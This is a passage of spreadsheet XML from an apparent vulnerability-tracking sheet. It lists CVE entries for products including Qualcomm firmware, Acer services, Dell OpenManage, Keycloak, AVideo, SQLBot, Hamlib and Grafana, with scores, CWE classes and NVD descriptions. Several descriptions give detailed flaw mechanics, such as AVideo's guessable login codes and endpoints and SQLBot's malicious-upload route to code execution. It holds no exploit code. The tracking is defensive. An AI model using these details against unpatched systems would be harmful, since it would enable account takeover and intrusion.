      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing large or numerous request buffers without sufficient memory allocation validation.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25281</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25294</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Transient DOS while parsing frame during channel usage.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25294</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50605</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer Agent Service component included with NitroSense and PredatorSense. Insufficient access controls within a privileged service may allow an authenticated local user to perform unauthorized registry operations. In certain situations, this could lead to privilege escalation or compromise of the affected system.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50605</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50609</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. Insufficient access controls within a privileged Named Pipe service may allow an authenticated local user to perform unauthorized registry operations. In certain situations, this could lead to privilege escalation or compromise of the affected system.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50609</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50610</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense due to insufficient access controls in a privileged service. An authenticated local user may be able to access the service and perform unauthorized registry modifications, potentially resulting in local privilege escalation.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50610</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78501</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-923</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft 365 Copilot's Business Chat allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78501</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81446</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Server-Side Request Forgery (SSRF) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81446</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86688</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Session Fixation vulnerability in team-alembic ash_authentication allows an attacker who can plant a session identifier in a victim's browser to hold an authenticated session once that victim signs in.
AshAuthentication.Plug.Helpers.store_in_session/2 writes the authenticated subject into the existing session with Plug.Conn.put_session/3 and never calls Plug.Conn.configure_session(renew: true), so the identifier the visitor arrived with carries into their authenticated session. Every authentication event reaches this one function: the default success/4 injected by AshAuthentication.Phoenix.Controller.__using__/1, the AuthController emitted by mix ash_authentication_phoenix.install, and remember-me auto-login. AshAuthentication.Phoenix.Plug.store_in_session/2 is a defdelegate to it. Logout does not close the window either, because clear_session/2 ends with Plug.Conn.clear_session/1, which clears session contents but leaves the identifier intact, so a planted identifier survives a logout-then-login cycle.
This issue affects ash_authentication: from 0.2.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86688</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90997</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>mysql, keycloak</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Keycloak. When deployed in stateless mode with MySQL or MariaDB, a mismatch in row-count semantics between the database driver and Keycloak's application logic allows an attacker to bypass replay protection. This vulnerability enables an attacker who intercepts single-use security artifacts, such as JWT client assertions, DPoP proofs, or one-time password (TOTP) codes, to replay them. Successful exploitation grants unauthorized access to the token endpoint or login flow.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90997</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92913</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.4</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2026-09-17</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 uses a cryptographically weak pseudo-random number generator when creating account activation / login pairing codes. getRandomCode() in objects/functions.php derives the code entirely from uniqid() (sprintf('%08x%05x', seconds, microseconds)) with a single non-CSPRNG rand() character used only as padding, reducing the code space to roughly 36 x 10^6 (~2^25) values for a known generation second. Because plugin/API/set.json.php?APIName=login_code can be called without authentication, it also serves as an oracle for the server's exact microtime. An unauthenticated remote attacker who guesses a valid, unexpired code (codes expire after 10 minutes) can redeem it at plugin/API/get.json.php?APIName=login_code to obtain the target account's email address and a User::getUserHash(users_id, '+1 year') value, a credential accepted in place of the account password for one year, resulting in account takeover. No patched version is available.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92913</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25284</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Information Disclosure when a pointer is reused after being deallocated.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25284</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53554</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, the POST /api/v1/datasource/parseExcel endpoint in backend/apps/datasource/api/datasource.py uses attacker-controlled multipart filename data when selecting where uploaded content is stored, writes the content before spreadsheet parsing and validation finish, and can transform a double-extension filename into a Python source file. An attacker able to submit a crafted multipart upload can use these behaviors to place attacker-controlled content in /opt/sqlbot/app/alembic/versions/ even when a spreadsheet parsing failure after the file write causes the endpoint to return an error. The planted file remains on disk, and subsequent SQLBot startup or migration processing causes Alembic to import the module and execute its module-level statements in the SQLBot application runtime. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53554</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54634</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-787, CWE-908</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Hamlib is a ham radio control library for radios, rotators, and amplifiers. Prior to 4.7.2, the unauthenticated rigctld send_raw command on TCP port 4532 reaches rigctl_send_raw() in tests/rigctl_parse.c, which writes a NUL byte at buf[buf_len + 1] outside its 200-byte stack buffer, and rig_send_raw() in src/rig.c, which copies reply_len - 1 bytes instead of the actual nbytes received. A remote client can send the CR terminator with a short payload to trigger both flaws in one command under the default no-password configuration. The out-of-bounds write can crash the daemon or corrupt adjacent stack memory, while the oversized copy can return up to 198 bytes of uninitialized stack data to the client. This issue is fixed in version 4.7.2.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54634</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66269</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66269</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76154</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting vulnerability in the Geomap panel's MapLibre base layer allows a user with the Editor role to execute arbitrary JavaScript in another user's session by hosting a malicious style configuration, enabling escalation to Org Admin.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76154</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80356</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80356</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81440</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
